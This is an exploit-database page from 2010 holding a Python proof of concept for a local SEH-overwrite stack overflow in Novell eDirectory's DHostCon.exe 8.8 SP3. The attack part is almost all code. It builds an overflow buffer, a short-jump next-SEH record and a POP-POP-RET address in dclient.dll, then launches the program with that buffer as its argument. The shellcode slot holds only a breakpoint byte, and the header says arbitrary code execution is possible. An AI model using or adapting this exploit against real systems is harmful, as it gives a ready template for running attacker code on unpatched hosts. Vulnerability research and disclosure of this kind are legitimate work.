[dos / poc] - Novel eDirectory DHost Console 8.8 SP3 Local S
Posted on 17 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite by d0lc3 in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================================== Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite ========================================================== # Exploit Title: Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite # Date: 17/10/2010 # Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/) # Software Link: http://www.novell.com/ # Version: 8.8 SP3 (20216.67)] # Tested on: win32 xp sp3 (spa) #Summary: # DHostCon.exe is prone to local denial of service caused by stack overflow # triggered if user-supplied parameters are too long (1074 bytes). # Due nature of this vulnerabilty, attackers could exploit this issue # to execute arbitrary code on local host. #PoC: #!/usr/bin/python import os,struct def main(): path="C:NovellNDSdhostcon.exe" args="x.x.x.x" #ip server buf="A"*1065 nseh=struct.pack("<L",0x90909eeb) #jmp short 0012ff50 +NOP + NOP seh=struct.pack("<L",0x61012c20) #PPR dclient.dll shellcode=struct.pack("<B",0xCC) #INT3 crash=buf+shellcode+nseh+seh os.system(path+" "+args+" "+crash) #Crash! if __name__=="__main__": main() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-17]</pre></body></html>